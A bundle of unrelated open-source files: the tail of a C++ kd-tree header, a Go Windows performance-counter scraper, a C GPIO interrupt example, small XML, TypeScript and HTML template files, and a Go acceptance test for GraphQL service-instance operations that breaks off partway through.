template <typename Func> bool search_i(Vec<float, D>& bb0, Vec<float, D>& bb1, Func cbfunc, int ni) const {
  if (!_arnode.num()) return false;
  int nelemvis = 0;  // number of entries examined (for optional statistics)
  bool ret = rec_search(ni, ni, bb0, bb1, cbfunc, nelemvis);
  if (0) {  // not thread-safe
    static const bool b_stats = getenv_bool("KD_STATS");
    static Stat SKDsearchnel("SKDsearchnel", b_stats);
    if (b_stats) SKDsearchnel.enter(nelemvis);
  }
  return ret;
}
// nlca == lowest common ancestor
// Recursive range query: reports every entry stored at visited nodes whose
// box strictly overlaps the query box [bb0, bb1], descending into whichever
// children the query box reaches.  Single-child paths are followed
// iteratively; recursion happens only when both children must be visited.
// Returns true if the callback requested an early stop.
template <typename Func>
bool rec_search(int ni, int nlca, Vec<float, D>& bb0, Vec<float, D>& bb1, Func cbfunc, int& nelemvis) const {
  for (;;) {
    const Node& n = _arnode[ni];
    for (int ei : n._stackei) {
      const Entry& e = _arentry[ei];
      nelemvis++;
      // Open-interval overlap test between the entry box and the query box.
      bool overlaps = true;
      for_int(i, D) {
        // SHOW(bb0[i], bb1[i], e._bb[0][i], e._bb[1][i]);
        if (e._bb[0][i] >= bb1[i] || e._bb[1][i] <= bb0[i]) {
          overlaps = false;
          break;
        }
      }
      if (!overlaps) continue;
      // The callback may shrink bb0/bb1 to narrow subsequent tests.
      if (cbfunc(e._id, bb0, bb1, nlca) == ECallbackReturn::stop) return true;
    }
    const int axis = n._axis;
    ASSERTX(axis >= 0 && axis < D);
    const float val = n._val;
    bool want_l = n._l >= 0 && bb0[axis] < val;
    bool want_h = n._h >= 0 && bb1[axis] > val;
    if (want_l && want_h) {  // single recursion
      if (rec_search(n._h, nlca, bb0, bb1, cbfunc, nelemvis)) return true;
      if (!(bb0[axis] < val)) return false;  // test again because bb may have changed
      ni = n._l;
    } else if (want_l) {
      if (nlca == ni) nlca = n._l;  // query descends into only one child, so the lca moves down
      ni = n._l;
    } else if (want_h) {
      if (nlca == ni) nlca = n._h;
      ni = n._h;
    } else {
      return false;  // no reachable child overlaps the query box
    }
  }
}
// Debug dump of the subtree rooted at ni to std::cerr, indented by recursion
// level l.  Prints "<nil>" for absent subtrees.
void rec_print(int ni, int l) const {
  for_int(i, l) std::cerr << " ";
  if (ni < 0) {
    std::cerr << "<nil>\n";
    return;
  }
  const Node& n = _arnode[ni];
  std::cerr << sform("partition of axis %d along %g <<\n", n._axis, n._val);
  for (int ei : n._stackei) {
    const Entry& e = _arentry[ei];
    for_int(i, l) std::cerr << " ";
    std::cerr << e._id << "\n";
  }
  for_int(i, l) std::cerr << " ";
  std::cerr << ">>\n";
  rec_print(n._l, l + 1);
  rec_print(n._h, l + 1);
}
};
} // namespace hh
#endif // MESH_PROCESSING_LIBHH_KDTREE_H_
| {
"pile_set_name": "Github"
} |
// Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// +build windows
package perfcounters
import (
	"fmt"
	"sort"
	"strconv"
	"strings"

	"github.com/leoluk/perflib_exporter/perflib"

	"go.opentelemetry.io/collector/internal/processor/filterset"
)
// totalInstanceName is the synthetic "_Total" aggregate instance reported by
// Windows performance counters.
const totalInstanceName = "_Total"

// PerfCounterScraper scrapes performance counter data.
type PerfCounterScraper interface {
	// Initialize initializes the PerfCounterScraper so that subsequent calls
	// to Scrape will return performance counter data for the specified set
	// of objects.
	Initialize(objects ...string) error
	// Scrape returns performance data for the initialized objects.
	Scrape() (PerfDataCollection, error)
}
// PerfLibScraper is an implementation of PerfCounterScraper that uses
// perflib to scrape performance counter data.
type PerfLibScraper struct {
	// objectIndices is a space-separated list of perflib object indices,
	// built by Initialize and passed verbatim to perflib.QueryPerformanceData.
	objectIndices string
}
// Initialize resolves each object name to its perflib index via the English
// name table and stores the indices as the space-separated query string used
// by Scrape.  Returns an error naming the first object that cannot be found.
func (p *PerfLibScraper) Initialize(objects ...string) error {
	// "Counter 009" reads perf counter names in English.
	// This is always present regardless of the OS language.
	nameTable := perflib.QueryNameTable("Counter 009")

	// Look up object indices from the name table, de-duplicating repeats.
	objectIndicesMap := map[uint32]struct{}{}
	for _, name := range objects {
		index := nameTable.LookupIndex(name)
		if index == 0 {
			return fmt.Errorf("failed to retrieve perf counter object %q", name)
		}
		objectIndicesMap[index] = struct{}{}
	}

	// Convert to a space-separated string.  Sort first so the query string is
	// deterministic; previously it depended on Go's randomized map iteration
	// order, making repeated runs issue differently-ordered queries.
	objectIndicesSlice := make([]string, 0, len(objectIndicesMap))
	for k := range objectIndicesMap {
		objectIndicesSlice = append(objectIndicesSlice, strconv.Itoa(int(k)))
	}
	sort.Strings(objectIndicesSlice)
	p.objectIndices = strings.Join(objectIndicesSlice, " ")
	return nil
}
// Scrape queries performance data for the objects selected by Initialize and
// returns them as a collection indexed by object name.
func (p *PerfLibScraper) Scrape() (PerfDataCollection, error) {
	perfObjects, err := perflib.QueryPerformanceData(p.objectIndices)
	if err != nil {
		return nil, err
	}

	byName := make(map[string]*perflib.PerfObject, len(perfObjects))
	for _, po := range perfObjects {
		byName[po.Name] = po
	}
	return perfDataCollection{perfObject: byName}, nil
}
// PerfDataCollection represents a collection of perf counter data.
type PerfDataCollection interface {
	// GetObject returns the perf counter data associated with the specified object,
	// or returns an error if no data exists for this object name.
	GetObject(objectName string) (PerfDataObject, error)
}

// perfDataCollection is the perflib-backed implementation of
// PerfDataCollection, holding scraped objects indexed by name.
type perfDataCollection struct {
	perfObject map[string]*perflib.PerfObject
}
// GetObject looks up the scraped perf counter data for objectName.
func (p perfDataCollection) GetObject(objectName string) (PerfDataObject, error) {
	perfObj, found := p.perfObject[objectName]
	if !found {
		return nil, fmt.Errorf("Unable to find object %q", objectName)
	}

	return perfDataObject{perfObj}, nil
}
// PerfDataObject represents a collection of perf counter values
// and associated instances.
// (Was mislabeled "PerfDataCollection" in the original comment.)
type PerfDataObject interface {
	// Filter filters the perf counter data to only retain data related to
	// relevant instances based on the supplied parameters.
	Filter(includeFS, excludeFS filterset.FilterSet, includeTotal bool)
	// GetValues returns the performance counter data associated with the specified
	// counters, or returns an error if any of the specified counter names do not
	// exist.
	GetValues(counterNames ...string) ([]*CounterValues, error)
}

// perfDataObject adapts a scraped *perflib.PerfObject to the PerfDataObject
// interface.
type perfDataObject struct {
	*perflib.PerfObject
}
// Filter retains only the instances admitted by includeDevice, replacing
// obj.Instances in place.  When no filters are supplied and totals are
// included, the instance list is left untouched.
func (obj perfDataObject) Filter(includeFS, excludeFS filterset.FilterSet, includeTotal bool) {
	nothingToFilter := includeFS == nil && excludeFS == nil && includeTotal
	if nothingToFilter {
		return
	}

	kept := make([]*perflib.PerfInstance, 0, len(obj.Instances))
	for _, inst := range obj.Instances {
		if !includeDevice(inst.Name, includeFS, excludeFS, includeTotal) {
			continue
		}
		kept = append(kept, inst)
	}
	obj.Instances = kept
}
// includeDevice reports whether the named instance passes the include/exclude
// filters; the "_Total" aggregate is governed solely by includeTotal.
// A nil include filter admits everything; a nil exclude filter rejects nothing.
func includeDevice(deviceName string, includeFS, excludeFS filterset.FilterSet, includeTotal bool) bool {
	if deviceName == totalInstanceName {
		return includeTotal
	}
	included := includeFS == nil || includeFS.Matches(deviceName)
	excluded := excludeFS != nil && excludeFS.Matches(deviceName)
	return included && !excluded
}
// CounterValues represents a set of perf counter values for a given instance.
type CounterValues struct {
	InstanceName string           // instance name, e.g. a device name or "_Total"
	Values       map[string]int64 // raw counter value keyed by counter name
}

// counterIndex pairs a counter definition's position within CounterDefs with
// its name, so per-instance values can be looked up by position.
type counterIndex struct {
	index int
	name  string
}
// GetValues extracts the raw values of the named counters for every instance
// of this object.  If any requested counter cannot be resolved, an error
// listing the missing names is returned and no values are produced.
// NOTE(review): assumes each requested name matches at most one non-base
// counter definition — confirm against perflib's data model.
func (obj perfDataObject) GetValues(counterNames ...string) ([]*CounterValues, error) {
	counterIndices := make([]counterIndex, 0, len(counterNames))
	for idx, counter := range obj.CounterDefs {
		// "Base" values give the value of a related counter that pdh.dll uses to compute the derived
		// value for this counter. We only care about raw values so ignore base values. See
		// https://docs.microsoft.com/en-us/windows/win32/perfctrs/retrieving-counter-data.
		if counter.IsBaseValue {
			continue
		}

		for _, counterName := range counterNames {
			if counter.Name == counterName {
				counterIndices = append(counterIndices, counterIndex{index: idx, name: counter.Name})
				break
			}
		}
	}

	// Fewer matches than requests means at least one counter is missing.
	if len(counterIndices) < len(counterNames) {
		return nil, fmt.Errorf("Unable to find counters %q in object %q", missingCounterNames(counterNames, counterIndices), obj.Name)
	}

	values := make([]*CounterValues, len(obj.Instances))
	for i, instance := range obj.Instances {
		instanceValues := &CounterValues{InstanceName: instance.Name, Values: make(map[string]int64, len(counterIndices))}
		for _, counter := range counterIndices {
			instanceValues.Values[counter.name] = instance.Counters[counter.index].Value
		}
		values[i] = instanceValues
	}
	return values, nil
}
// missingCounterNames returns, in input order, the requested counter names
// that were not matched by any entry in counterIndices.
func missingCounterNames(counterNames []string, counterIndices []counterIndex) []string {
	found := make(map[string]struct{}, len(counterIndices))
	for _, ci := range counterIndices {
		found[ci.name] = struct{}{}
	}

	missing := make([]string, 0, len(counterNames)-len(found))
	for _, name := range counterNames {
		if _, ok := found[name]; ok {
			continue
		}
		missing = append(missing, name)
	}
	return missing
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<DICTIONARY type="singlelanguage" lang="sk" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="dictionary.xsd">
</DICTIONARY>
| {
"pile_set_name": "Github"
} |
/**
* @module adaptive-expressions
*/
/**
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License.
*/
export * from './parseErrorListener';
export * from './expressionParser';
export * from './util';
export * from './generated';
| {
"pile_set_name": "Github"
} |
/*
* Author: Brendan Le Foll
* Contributors: Alex Tereschenko <[email protected]>
* Contributors: Manivannan Sadhasivam <[email protected]>
* Copyright (c) 2014 Intel Corporation.
*
* SPDX-License-Identifier: MIT
*
* Example usage: Configures GPIO pin for interrupt and waits 30 seconds for the isr to trigger
*
*/
/* standard headers */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* mraa header */
#include "mraa/gpio.h"
#define GPIO_PIN 6
/*
 * ISR callback invoked on each GPIO edge event.
 *
 * @param args user-data pointer registered with mraa_gpio_isr() (unused here)
 */
void
int_handler(void* args)
{
    (void) args; /* explicitly unused; silences -Wunused-parameter */
    fprintf(stdout, "ISR triggered\n");
}
/*
 * Demonstrates edge-triggered GPIO interrupts: configures GPIO_PIN as an
 * input, attaches int_handler on both rising and falling edges, then waits
 * 30 seconds for triggers before cleaning up.
 *
 * Returns EXIT_SUCCESS, or EXIT_FAILURE on any mraa error.
 */
int
main()
{
    mraa_result_t status = MRAA_SUCCESS;
    mraa_gpio_context gpio;

    /* initialize mraa for the platform (not needed most of the times) */
    mraa_init();

    //! [Interesting]
    /* initialize GPIO pin */
    gpio = mraa_gpio_init(GPIO_PIN);
    if (gpio == NULL) {
        fprintf(stderr, "Failed to initialize GPIO %d\n", GPIO_PIN);
        mraa_deinit();
        return EXIT_FAILURE;
    }

    /* set GPIO to input */
    status = mraa_gpio_dir(gpio, MRAA_GPIO_IN);
    if (status != MRAA_SUCCESS) {
        goto err_exit;
    }

    /* configure ISR for GPIO, firing on both edges */
    status = mraa_gpio_isr(gpio, MRAA_GPIO_EDGE_BOTH, &int_handler, NULL);
    if (status != MRAA_SUCCESS) {
        goto err_exit;
    }

    /* wait 30 seconds for an isr trigger */
    sleep(30);

    /* close GPIO */
    mraa_gpio_close(gpio);
    //! [Interesting]

    /* deinitialize mraa for the platform (not needed most of the times) */
    mraa_deinit();

    return EXIT_SUCCESS;

err_exit:
    mraa_result_print(status);

    /* deinitialize mraa for the platform (not needed most of the times) */
    mraa_deinit();

    return EXIT_FAILURE;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<vector xmlns:android="http://schemas.android.com/apk/res/android"
android:width="108dp"
android:height="108dp"
android:viewportHeight="176"
android:viewportWidth="176">
<group
android:scaleX="0.45"
android:scaleY="0.45"
android:translateX="45"
android:translateY="45">
<path
android:name="ic_app_shortcut_last_added_ic"
android:fillColor="#000"
android:pathData="M124.35,92h-16.2v16.2h-8.1V92H83.85v-8.1h16.2V67.65h8.1v16.2h16.2M128.4,55.5H79.8a8.1,8.1,0,0,0-8.1,8.1v48.6a8.1,8.1,0,0,0,8.1,8.1h48.6a8.1,8.1,0,0,0,8.1-8.1V63.6a8.1,8.1,0,0,0-8.1-8.1M63.6,71.7H55.5v56.7a8.1,8.1,0,0,0,8.1,8.1h56.7v-8.1H63.6Z" />
</group>
</vector> | {
"pile_set_name": "Github"
} |
{{$rin := RandTen}}
<div id="{{$rin}}">
<h5 class="text-muted">Log details</h5>
<div class="list-group">
<div class="list-group-item">
<h4><i class="fa fa-time"></i> {{.Time}}</h4>
</div>
{{with .Bugs}}
{{range .}}
<div class="list-group-item"><p class="text-muted pull-right"><i class="fa fa-warning"></i></p> <p>{{.Line}}</p>
<p class="reference" data-link="{{.Action}}" >{{parseLog .Action}}</p>
<p ><label class="label label-big label-warning" >{{.CTA}}</label></p>
</div>
{{end}}
{{end}}
<div class="list-group-item">
<h4><i class="fa fa-list"></i> Full log</h4>
<pre style="max-height: 800px"><code>{{printf "%s" .RawLog}}</code></pre>
</div>
</div>
<!-- <script type="text/javascript">
$maphedg = {"meth":"Pipelines section","structs":"Interface declarations' section","service": "Web service","main" : "your main function","init":"your init function","edit":"Edit Go go source"};
setTimeout(function(){
$(".reference", "#" + {{$rin}}).each(function(e,i){
if($(this).attr("data-link") != ""){
parts = $(this).attr("data-link").split(":")
if ( $(this).attr("data-link").includes("service:") ) {
$(this).html("The line is located in " + $maphedg[parts[0]] + "( " + parts[1] + ") at line: " + parts[2] + " of package " + {{.PKG}})
} else if ( !$(this).attr("data-link").includes("edit:") ){
$(this).html("The line is located in " + $maphedg[parts[0]] + " at line: " + parts[1] + " of package " + {{.PKG}})
}
}
return false;
});
}, 400);
</script> -->
</div> | {
"pile_set_name": "Github"
} |
// +build acceptance
package servicecatalog
import (
"fmt"
"testing"
tester "github.com/kyma-project/kyma/tests/console-backend-service"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/client"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/domain/shared"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/domain/shared/auth"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/domain/shared/fixture"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/domain/shared/wait"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/graphql"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
// ServiceInstanceEvent mirrors the GraphQL serviceInstanceEvent payload.
type ServiceInstanceEvent struct {
	Type            string
	ServiceInstance shared.ServiceInstance
}

// instancesQueryResponse decodes the `serviceInstances` list query result.
type instancesQueryResponse struct {
	ServiceInstances []shared.ServiceInstance
}

// instanceQueryResponse decodes the `serviceInstance` single query result.
type instanceQueryResponse struct {
	ServiceInstance shared.ServiceInstance
}

// instanceCreateMutationResponse decodes the `createServiceInstance` mutation result.
type instanceCreateMutationResponse struct {
	CreateServiceInstance shared.ServiceInstance
}

// instanceDeleteMutationResponse decodes the `deleteServiceInstance` mutation result.
type instanceDeleteMutationResponse struct {
	DeleteServiceInstance shared.ServiceInstance
}
// TestServiceInstanceMutationsAndQueries exercises the full lifecycle of
// service instances through the GraphQL API — subscribe, create, query
// (single, list, list-by-status) and delete — for instances backed by both
// cluster-scoped and namespaced service classes, and finally verifies the
// authorization directives on every operation.
func TestServiceInstanceMutationsAndQueries(t *testing.T) {
	c, err := graphql.New()
	require.NoError(t, err)

	k8sClient, _, err := client.NewClientWithConfig()
	require.NoError(t, err)

	svcatCli, _, err := client.NewServiceCatalogClientWithConfig()
	require.NoError(t, err)

	expectedResourceFromClusterServiceClass := fixture.ServiceInstanceFromClusterServiceClass("cluster-test-instance", TestNamespace)
	expectedResourceFromServiceClass := fixture.ServiceInstanceFromServiceClass("test-instance", TestNamespace)
	resourceDetailsQuery := instanceDetailsFields()

	t.Log(fmt.Sprintf("Subscribe instance created by %s", ClusterServiceBrokerKind))
	subscription := subscribeInstance(c, instanceEventDetailsFields(), expectedResourceFromClusterServiceClass.Namespace)
	defer subscription.Close()

	t.Log(fmt.Sprintf("Create instance from %s", ClusterServiceBrokerKind))
	createRes, err := createInstance(c, resourceDetailsQuery, expectedResourceFromClusterServiceClass, true)
	require.NoError(t, err)
	checkInstanceFromClusterServiceClass(t, expectedResourceFromClusterServiceClass, createRes.CreateServiceInstance)

	t.Log(fmt.Sprintf("Check subscription event of instance created by %s", ClusterServiceBrokerKind))
	expectedEvent := instanceEvent("ADD", expectedResourceFromClusterServiceClass)
	event, err := readInstanceEvent(subscription)
	assert.NoError(t, err)
	checkInstanceEvent(t, expectedEvent, event)

	// BUGFIX: was `t.Log(("...%s"), ClusterServiceBrokerKind)`, which logged
	// the raw format string and the kind as two separate values.
	t.Log(fmt.Sprintf("Wait for instance Ready created by %s", ClusterServiceBrokerKind))
	err = wait.ForServiceInstanceReady(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli)
	if err != nil {
		shared.LogReport(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli, k8sClient)
	}
	assert.NoError(t, err)

	t.Log(fmt.Sprintf("Create instance from %s", ServiceBrokerKind))
	createRes, err = createInstance(c, resourceDetailsQuery, expectedResourceFromServiceClass, false)
	require.NoError(t, err)
	checkInstanceFromServiceClass(t, expectedResourceFromServiceClass, createRes.CreateServiceInstance)

	t.Log(fmt.Sprintf("Wait for instance Ready created by %s", ServiceBrokerKind))
	err = wait.ForServiceInstanceReady(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli)
	if err != nil {
		shared.LogReport(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli, k8sClient)
	}
	assert.NoError(t, err)

	t.Log(fmt.Sprintf("Query Single Resource - instance created by %s", ClusterServiceBrokerKind))
	res, err := querySingleInstance(c, resourceDetailsQuery, expectedResourceFromClusterServiceClass)
	assert.NoError(t, err)
	checkInstanceFromClusterServiceClass(t, expectedResourceFromClusterServiceClass, res.ServiceInstance)

	t.Log(fmt.Sprintf("Query Single Resource - instance created by %s", ServiceBrokerKind))
	res, err = querySingleInstance(c, resourceDetailsQuery, expectedResourceFromServiceClass)
	assert.NoError(t, err)
	checkInstanceFromServiceClass(t, expectedResourceFromServiceClass, res.ServiceInstance)

	t.Log("Query Multiple Resources")
	multipleRes, err := queryMultipleInstances(c, resourceDetailsQuery, TestNamespace)
	assert.NoError(t, err)
	assertInstanceFromClusterServiceClassExistsAndEqual(t, expectedResourceFromClusterServiceClass, multipleRes.ServiceInstances)
	assertInstanceFromServiceClassExistsAndEqual(t, expectedResourceFromServiceClass, multipleRes.ServiceInstances)

	// We must again wait for RUNNING status of created instances, because sometimes Kubernetess change status from RUNNING to PROVISIONING at the first queries - Query Single Resource
	t.Log(fmt.Sprintf("Wait for instance Ready created by %s", ClusterServiceBrokerKind))
	err = wait.ForServiceInstanceReady(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli)
	if err != nil {
		shared.LogReport(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli, k8sClient)
	}
	assert.NoError(t, err)

	t.Log(fmt.Sprintf("Wait for instance Ready created by %s", ServiceBrokerKind))
	err = wait.ForServiceInstanceReady(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli)
	if err != nil {
		shared.LogReport(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli, k8sClient)
	}
	assert.NoError(t, err)

	t.Log("Query Multiple Resources With Status")
	multipleResWithStatus, err := queryMultipleInstancesWithStatus(c, resourceDetailsQuery, TestNamespace)
	assert.NoError(t, err)
	assertInstanceFromClusterServiceClassExistsAndEqual(t, expectedResourceFromClusterServiceClass, multipleResWithStatus.ServiceInstances)
	// BUGFIX: previously asserted against `multipleRes` (the unfiltered list)
	// instead of the status-filtered result being tested here.
	assertInstanceFromServiceClassExistsAndEqual(t, expectedResourceFromServiceClass, multipleResWithStatus.ServiceInstances)

	t.Log(fmt.Sprintf("Delete instance created by %s", ClusterServiceBrokerKind))
	deleteRes, err := deleteInstance(c, resourceDetailsQuery, expectedResourceFromClusterServiceClass)
	assert.NoError(t, err)
	checkInstanceFromClusterServiceClass(t, expectedResourceFromClusterServiceClass, deleteRes.DeleteServiceInstance)

	t.Log(fmt.Sprintf("Wait for deletion of instance created by %s", ClusterServiceBrokerKind))
	err = wait.ForServiceInstanceDeletion(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli)
	if err != nil {
		shared.LogReport(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli, k8sClient)
	}
	assert.NoError(t, err)

	t.Log(fmt.Sprintf("Delete instance created by %s", ServiceBrokerKind))
	deleteRes, err = deleteInstance(c, resourceDetailsQuery, expectedResourceFromServiceClass)
	assert.NoError(t, err)
	checkInstanceFromServiceClass(t, expectedResourceFromServiceClass, deleteRes.DeleteServiceInstance)

	t.Log(fmt.Sprintf("Wait for deletion of instance created by %s", ServiceBrokerKind))
	err = wait.ForServiceInstanceDeletion(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli)
	if err != nil {
		// BUGFIX: previously logged the cluster-scoped instance here
		// (copy-paste), hiding diagnostics for the namespaced instance.
		shared.LogReport(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli, k8sClient)
	}
	assert.NoError(t, err)

	t.Log("Checking authorization directives...")
	ops := &auth.OperationsInput{
		auth.Get: {fixServiceInstanceRequest(resourceDetailsQuery, expectedResourceFromServiceClass)},
		auth.List: {
			fixServiceInstancesRequest(resourceDetailsQuery, expectedResourceFromServiceClass.Namespace),
			fixServiceInstancesWithStatusRequest(resourceDetailsQuery, expectedResourceFromServiceClass.Namespace),
		},
		auth.Create: {
			fixCreateServiceInstanceRequest(resourceDetailsQuery, fixture.ServiceInstanceFromClusterServiceClass("", TestNamespace), true),
			fixCreateServiceInstanceRequest(resourceDetailsQuery, fixture.ServiceInstanceFromServiceClass("", TestNamespace), false),
		},
		auth.Delete: {fixDeleteServiceInstanceRequest(resourceDetailsQuery, expectedResourceFromServiceClass)},
		auth.Watch:  {fixInstanceSubscription(instanceEventDetailsFields(), TestNamespace)},
	}
	AuthSuite.Run(t, ops)
}
// fixCreateServiceInstanceRequest builds the createServiceInstance mutation.
// clusterWide selects whether classRef/planRef resolve against cluster-scoped
// or namespaced service classes; it is spliced into the query text while all
// other inputs travel as GraphQL variables.
func fixCreateServiceInstanceRequest(resourceDetailsQuery string, expectedResource shared.ServiceInstance, clusterWide bool) *graphql.Request {
	query := fmt.Sprintf(`
		mutation ($name: String!, $namespace: String!, $externalPlanName: String!, $externalServiceClassName: String!, $labels: [String!]!, $parameterSchema: JSON) {
			createServiceInstance(namespace: $namespace, params: {
				name: $name,
				classRef: {
					externalName: $externalServiceClassName,
					clusterWide: %v,
				},
				planRef: {
					externalName: $externalPlanName,
					clusterWide: %v,
				},
				labels: $labels,
				parameterSchema: $parameterSchema
			}) {
				%s
			}
		}
	`, clusterWide, clusterWide, resourceDetailsQuery)
	req := graphql.NewRequest(query)
	req.SetVar("name", expectedResource.Name)
	req.SetVar("namespace", expectedResource.Namespace)
	// Cluster-scoped and namespaced fixtures carry the external class/plan
	// names on different fields.
	if clusterWide {
		req.SetVar("externalPlanName", expectedResource.ClusterServicePlan.ExternalName)
		req.SetVar("externalServiceClassName", expectedResource.ClusterServiceClass.ExternalName)
	} else {
		req.SetVar("externalPlanName", expectedResource.ServicePlan.ExternalName)
		req.SetVar("externalServiceClassName", expectedResource.ServiceClass.ExternalName)
	}
	req.SetVar("labels", expectedResource.Labels)
	req.SetVar("parameterSchema", expectedResource.PlanSpec)

	return req
}
// createInstance issues the createServiceInstance mutation and decodes the
// created instance from the response.
func createInstance(c *graphql.Client, resourceDetailsQuery string, expectedResource shared.ServiceInstance, clusterWide bool) (instanceCreateMutationResponse, error) {
	req := fixCreateServiceInstanceRequest(resourceDetailsQuery, expectedResource, clusterWide)

	var res instanceCreateMutationResponse
	err := c.Do(req, &res)

	return res, err
}

// fixInstanceSubscription builds the serviceInstanceEvent subscription
// request scoped to the given namespace.
func fixInstanceSubscription(resourceDetailsQuery string, namespace string) *graphql.Request {
	query := fmt.Sprintf(`
		subscription ($namespace: String!) {
			serviceInstanceEvent(namespace: $namespace) {
				%s
			}
		}
	`, resourceDetailsQuery)
	req := graphql.NewRequest(query)
	req.SetVar("namespace", namespace)

	return req
}

// subscribeInstance opens a GraphQL subscription for instance events in the
// namespace; the caller is responsible for closing it.
func subscribeInstance(c *graphql.Client, resourceDetailsQuery string, namespace string) *graphql.Subscription {
	req := fixInstanceSubscription(resourceDetailsQuery, namespace)
	return c.Subscribe(req)
}

// querySingleInstance runs the serviceInstance query for the expected
// resource's name/namespace.
func querySingleInstance(c *graphql.Client, resourceDetailsQuery string, expectedResource shared.ServiceInstance) (instanceQueryResponse, error) {
	req := fixServiceInstanceRequest(resourceDetailsQuery, expectedResource)

	var res instanceQueryResponse
	err := c.Do(req, &res)

	return res, err
}
// fixServiceInstancesRequest builds the list query for all instances in a
// namespace.
func fixServiceInstancesRequest(resourceDetailsQuery, namespace string) *graphql.Request {
	query := fmt.Sprintf(`
		query ($namespace: String!) {
			serviceInstances(namespace: $namespace) {
				%s
			}
		}
	`, resourceDetailsQuery)
	req := graphql.NewRequest(query)
	req.SetVar("namespace", namespace)

	return req
}

// queryMultipleInstances lists every instance in the namespace.
func queryMultipleInstances(c *graphql.Client, resourceDetailsQuery, namespace string) (instancesQueryResponse, error) {
	req := fixServiceInstancesRequest(resourceDetailsQuery, namespace)

	var res instancesQueryResponse
	err := c.Do(req, &res)

	return res, err
}

// fixServiceInstancesWithStatusRequest builds the list query filtered to
// RUNNING instances.
func fixServiceInstancesWithStatusRequest(resourceDetailsQuery, namespace string) *graphql.Request {
	query := fmt.Sprintf(`
		query ($namespace: String!, $status: InstanceStatusType) {
			serviceInstances(namespace: $namespace, status: $status) {
				%s
			}
		}
	`, resourceDetailsQuery)
	req := graphql.NewRequest(query)
	req.SetVar("namespace", namespace)
	req.SetVar("status", shared.ServiceInstanceStatusTypeRunning)

	return req
}

// queryMultipleInstancesWithStatus lists instances in the namespace filtered
// by the RUNNING status.
func queryMultipleInstancesWithStatus(c *graphql.Client, resourceDetailsQuery, namespace string) (instancesQueryResponse, error) {
	req := fixServiceInstancesWithStatusRequest(resourceDetailsQuery, namespace)

	var res instancesQueryResponse
	err := c.Do(req, &res)

	return res, err
}
// fixDeleteServiceInstanceRequest builds the deleteServiceInstance mutation
// for the expected resource's name/namespace.
func fixDeleteServiceInstanceRequest(resourceDetailsQuery string, expectedResource shared.ServiceInstance) *graphql.Request {
	query := fmt.Sprintf(`
		mutation ($name: String!, $namespace: String!) {
			deleteServiceInstance(name: $name, namespace: $namespace) {
				%s
			}
		}
	`, resourceDetailsQuery)
	req := graphql.NewRequest(query)
	req.SetVar("name", expectedResource.Name)
	req.SetVar("namespace", expectedResource.Namespace)

	return req
}

// deleteInstance issues the deleteServiceInstance mutation.
func deleteInstance(c *graphql.Client, resourceDetailsQuery string, expectedResource shared.ServiceInstance) (instanceDeleteMutationResponse, error) {
	req := fixDeleteServiceInstanceRequest(resourceDetailsQuery, expectedResource)

	var res instanceDeleteMutationResponse
	err := c.Do(req, &res)

	return res, err
}

// fixServiceInstanceRequest builds the single-instance query.
func fixServiceInstanceRequest(resourceDetailsQuery string, expectedResource shared.ServiceInstance) *graphql.Request {
	query := fmt.Sprintf(`
		query ($name: String!, $namespace: String!) {
			serviceInstance(name: $name, namespace: $namespace) {
				%s
			}
		}
	`, resourceDetailsQuery)
	req := graphql.NewRequest(query)
	req.SetVar("name", expectedResource.Name)
	req.SetVar("namespace", expectedResource.Namespace)

	return req
}
// instanceDetailsFields returns the GraphQL selection set requested for every
// service instance in this test file (identity, class/plan references,
// status, and related bindings/usages).
func instanceDetailsFields() string {
	return `
		name
		namespace
		planSpec
		bindable
		creationTimestamp
		labels
		classReference {
			name
			displayName
			clusterWide
		}
		planReference {
			name
			displayName
			clusterWide
		}
		status {
			type
			reason
			message
		}
		clusterServicePlan {
			name
			displayName
			externalName
			description
			relatedClusterServiceClassName
			instanceCreateParameterSchema
		}
		clusterServiceClass {
			name
			externalName
			displayName
			creationTimestamp
			description
			longDescription
			imageUrl
			documentationUrl
			supportUrl
			providerDisplayName
			tags
			activated
		}
		servicePlan {
			name
			displayName
			externalName
			description
			relatedServiceClassName
			instanceCreateParameterSchema
			bindingCreateParameterSchema
		}
		serviceClass {
			name
			namespace
			externalName
			displayName
			creationTimestamp
			description
			longDescription
			imageUrl
			documentationUrl
			supportUrl
			providerDisplayName
			tags
			activated
		}
		serviceBindings {
			items {
				name
				serviceInstanceName
				namespace
				secret {
					name
					namespace
					data
				}
			}
			stats {
				ready
